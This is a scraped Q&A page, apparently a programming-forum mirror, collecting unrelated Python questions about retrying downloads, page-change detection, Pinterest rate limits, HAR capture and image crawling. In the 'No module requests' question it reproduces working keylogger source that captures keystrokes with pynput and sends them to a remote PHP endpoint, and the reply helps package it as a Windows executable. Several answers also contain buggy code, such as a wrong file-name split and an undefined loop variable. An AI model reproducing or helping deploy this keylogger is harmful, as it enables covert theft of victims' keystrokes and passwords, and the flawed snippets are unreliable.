Error download when using python Wget lib - python

Is there a way to restart the download if the download get stuck at XX%? I'm trying to do scraping and download quite a lot of files. I'm using the below code. It will solve connection error, but it won't restart any download if it get stuck.
for element in elements:
for attempt in range(100):
try:
wget.download(element.get_attribute("href"), path)
except:
print("attempt error, retry" + str(attempt))
else:
break

Seems there is no feature to restart the download. I looked at many examples of this package -> https://www.programcreek.com/python/example/83386/wget.download. The page for the manual is gone and the pypi.org page does have have any info about a feature like this.
However, you can restart the download simply by adding another line to the except. This code will work for you.
# Set some variables to end loop after download success
# The download loop will exit if failed 5 times
downloaded = False
attempts = 0
for element in elements:
while not downloaded and attempts < 5:
try:
wget.download(element.get_attribute("href"), path)
# Set downloaded flag to end loop
downloaded = True
except:
print("attempt error, retry" + str(attempt))
wget.download(element.get_attribute("href"), path)
attempts += 1

Another approach it to use requests library which is more popular.
import requests
def proceed_files():
# Set some variables to end loop after download success
# The download loop will exit if failed 5 times
file_urls = ['list', 'of', 'file urls']
for url in file_urls:
downloaded = False
attempts = 0
while not downloaded and attempts < 5:
if download_file(url):
downloaded = True
else:
attempts += 1
def download_file(url):
try:
request = requests.get(url, allow_redirects=True)
file_name = url.split('/')[:-1]
open(file_name, 'wb').write(request.content)
return True
except:
return False

Related

No module requests found exe Window 10

When I convert this code with pyinstaller and run it as a exe in a window 10 vm it printed this error.
import pynput
import requests
import json
key_count = 0
keys = []
def on_press(key):
global key_count
global keys
keys.append(str(key))
key_count += 1
if key_count >= 10:
key_count = 0
send_keys()
def send_keys():
data = json.dumps({'key_data': ''.join(keys)})
headers = {'Content-type': 'application/json'}
keys.clear()
url = 'https://000webhostapp.com/dog.php'
try:
response = requests.post(url, data=data, headers=headers)
response.raise_for_status()
except requests.exceptions.RequestException as e:
print(f'Error: {e}')
else:
print('Data sent successfully')
with pynput.keyboard.Listener(on_press=on_press) as listener:
listener.join()
enter image description here
Need help Thank you in advance
I try to force to convert the python code with command to include the module but didnt work I dont know what to do.
Thank you
as far as I see from what you said, you are not using any virtualenv. You installed python directly on your computer and started using the script.
The Requests library is not one of the libraries that come with python by default.
To install;
python -m pip install requests
"What is virtualenv and how to use it?" To find an answer to the question with the example of the requests library;
https://docs.python-guide.org/dev/virtualenvs/
I already tried your command but it does the same error. I used this code to convert the .py
pyinstaller --onefile your_script_name.py
Thank you :)

Catching website changes with python using urlopen read function

Hi I am a high school student who has not used python to code programs much, and I was having trouble with creating code to check when a website was updated. I have looked at different resources and I have used them to create what I have but when I run the code it doesn't seem to work and do what I expect it to do. When I run the code I expect it to tell me if a site has been updated or stayed the same from when I last checked it. I put some print statements in the code to try to catch the issue, but it has only showed me that the website has changed even though it doesn't look like it has changed.
import time
import hashlib
from urllib.request import urlopen, Request
url = Request('https://www.canada.ca/en/immigration-refugees-citizenship/services/immigrate-canada/express-entry/submit-profile/rounds-invitations.html')
res = urlopen(url).read()
current = hashlib.sha224(res).hexdigest()
print("running")
time.sleep(10)
while True:
try:
res = urlopen(url).read()
current = hashlib.sha224(res).hexdigest()
print(current)
print(res)
time.sleep(30)
res = urlopen(url).read()
newHash = hashlib.sha224(res).hexdigest()
print (newHash)
print(res)
if newHash == current:
print ("nothing changed")
continue
else:
print("there was a change")
except AttributeError as e:
print ("error")

The time waiting problem on the Python Pinterest bot

I'm a rookie Python developer and trying to do small projects to improve myself. Nowadays, I'm developing a Pinterest bot in one of these. This simple bot pins the images in the folder to the account with the Pinterest API. The API has a maximum of 10 visual loading limits within one hour, and I don't want to limit the number of images in the file. I've tried a few things, but can't find a way without errors, because I'm inexperienced, think there's something I can't see. I would appreciate it if you could give me an idea.
I have written a simple if - else loop and each time after loading ten images in the file, it has 1-hour wait with time.sleep. The API gave a timeout error.
I've edited the loop above for 7 minutes. The API gave a timeout error.
I've tried to down time.sleep to a minute, it works well, but after ten images, the API limit has been a problem.
I've defined the code that runs the API as a function with def and placed it in the loop. I thought that it wouldn't be a problem because it would restart the API after the sleep phase with else. It pined ten images without any issues, but after the sleep back to the beginning, the API gave a timeout error.
Version with loop :
api = pinterest.Pinterest(token="")
board = ''
note = ''
link = ''
image_list = []
images = open("images.txt", "w")
for filename in glob.glob('images/*.jpg'):
image_list.append(filename)
i = 0
p = 0
while i < len(image_list):
if p <= 9 and image_list[i] not in images:
api.pin().create(board, note, link, image_list[i])
i += 1
p += 1
images.write(image_list[i])
else:
time.sleep(3600)
p = 0
continue
Version with def :
def dude() :
i = 0
api = pinterest.Pinterest(token="")
board = ''
note = ''
link = ''
api.pin().create(board, note, link, image_list[i])
time.sleep(420)
i = 0
while i < len(image_list):
dude()
i += 1
print(i)
After trying a lot of things, I was able to solve the problem with the retrying library. First I installed the library with the following code.
$ pip3 install retrying
After the installation, I changed my code as follows and the bot started working properly without any API or time error.
from retrying import retry
image_list = []
images = open("images.txt", "w")
for filename in glob.glob('images/*.jpg'):
image_list.append(filename)
#retry
def dude() :
api = pinterest.Pinterest(token="")
board = ''
note = ''
link = ''
api.pin().create(board, note, link, image_list[i])
i = 0
while i < len(image_list):
dude()
i += 1
time.sleep(420)

Incomplete HAR list using Python: Browsermobproxy, selenium, phantomJS

Fairly new to python, I learn by doing, so I thought I'd give this project a shot. Trying to create a script which finds the google analytics request for a certain website parses the request payload and does something with it.
Here are the requirements:
Ask user for 2 urls ( for comparing the payloads from 2 diff. HAR payloads)
Use selenium to open the two urls, use browsermobproxy/phantomJS to
get all HAR
Store the HAR as a list
From the list of all HAR files, find the google analytics request, including the payload
If Google Analytics tag found, then do things....like parse the payload, etc. compare the payload, etc.
Issue: Sometimes for a website that I know has google analytics, i.e. nytimes.com - the HAR that I get is incomplete, i.e. my prog. will say "GA Not found" but that's only because the complete HAR was not captured so when the regex ran to find the matching HAR it wasn't there. This issue in intermittent and does not happen all the time. Any ideas?
I'm thinking that due to some dependency or latency, the script moved on and that the complete HAR didn't get captured. I tried the "wait for traffic to stop" but maybe I didn't do something right.
Also, as a bonus, I would appreciate any help you can provide on how to make this script run fast, its fairly slow. As I mentioned, I'm new to python so go easy :)
This is what I've got thus far.
import browsermobproxy as mob
from selenium import webdriver
import re
import sys
import urlparse
import time
from datetime import datetime
def cleanup():
s.stop()
driver.quit()
proxy_path = '/Users/bob/Downloads/browsermob-proxy-2.1.4-bin/browsermob-proxy-2.1.4/bin/browsermob-proxy'
s = mob.Server(proxy_path)
s.start()
proxy = s.create_proxy()
proxy_address = "--proxy=127.0.0.1:%s" % proxy.port
service_args = [proxy_address, '--ignore-ssl-errors=yes', '--ssl-protocol=any'] # so that i can do https connections
driver = webdriver.PhantomJS(executable_path='/Users/bob/Downloads/phantomjs-2.1.1-windows/phantomjs-2.1.1-windows/bin/phantomjs', service_args=service_args)
driver.set_window_size(1400, 1050)
urlLists = []
collectTags = []
gaCollect = 0
varList = []
for x in range(0,2): # I want to ask the user for 2 inputs
url = raw_input("Enter a website to find GA on: ")
time.sleep(2.0)
urlLists.append(url)
if not url:
print "You need to type something in...here"
sys.exit()
#gets the two user url and stores in list
for urlList in urlLists:
print urlList, 'start 2nd loop' #printing for debug purpose, no need for this
if not urlList:
print 'Your Url list is empty'
sys.exit()
proxy.new_har()
driver.get(urlList)
#proxy.wait_for_traffic_to_stop(15, 30) #<-- tried this but did not do anything
for ent in proxy.har['log']['entries']:
gaCollect = (ent['request']['url'])
print gaCollect
if re.search(r'google-analytics.com/r\b', gaCollect):
print 'Found GA'
collectTags.append(gaCollect)
time.sleep(2.0)
break
else:
print 'No GA Found - Ending Prog.'
cleanup()
sys.exit()
cleanup()
This might be a stale question, but I found an answer that worked for me.
You need to change two things:
1 - Remove sys.exit() -- this causes your programme to stop after the first iteration through the ent list, so if what you want is not the first thing, it won't be found
2 - call new_har with the captureContent option enabled to get the payload of requests:
proxy.new_har(options={'captureHeaders':True, 'captureContent': True})
See if that helps.

Crawl images from google search with python

I am trying to write a script in python in order to crawl images from google search. I want to track the urls of images and after that store those images to my computer. I found a code to do so. However it only track 60 urls. Afterthat a timeout message appears. Is it possible to track more than 60 images?
My code:
def crawl_images(query, path):
BASE_URL = 'https://ajax.googleapis.com/ajax/services/search/images?'\
'v=1.0&q=' + query + '&start=%d'
BASE_PATH = os.path.join(path, query)
if not os.path.exists(BASE_PATH):
os.makedirs(BASE_PATH)
counter = 1
urls = []
start = 0 # Google's start query string parameter for pagination.
while start < 60: # Google will only return a max of 56 results.
r = requests.get(BASE_URL % start)
for image_info in json.loads(r.text)['responseData']['results']:
url = image_info['unescapedUrl']
print url
urls.append(url)
image = urllib.URLopener()
try:
image.retrieve(url,"model runway/image_"+str(counter)+".jpg")
counter +=1
except IOError, e:
# Throw away some gifs...blegh.
print 'could not save %s' % url
continue
print start
start += 4 # 4 images per page.
time.sleep(1.5)
crawl_images('model runway', '')
Have a look at the Documentation: https://developers.google.com/image-search/v1/jsondevguide
You should get up to 64 results:
Note: The Image Searcher supports a maximum of 8 result pages. When
combined with subsequent requests, a maximum total of 64 results are
available. It is not possible to request more than 64 results.
Another note: You can restrict the file type, this way you dont need to ignore gifs etc.
And as an additional Note, please keep in mind that this API should only be used for user operations and not for automated searches!
Note: The Google Image Search API must be used for user-generated
searches. Automated or batched queries of any kind are strictly
prohibited.
You can try the icrawler package. Extremely easy to use. I've never had problems with the number of images to be downloaded.

Categories